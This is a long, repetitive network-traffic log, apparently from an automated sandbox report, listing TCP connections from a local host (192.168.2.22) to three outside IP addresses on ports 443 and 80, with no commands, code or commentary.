                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
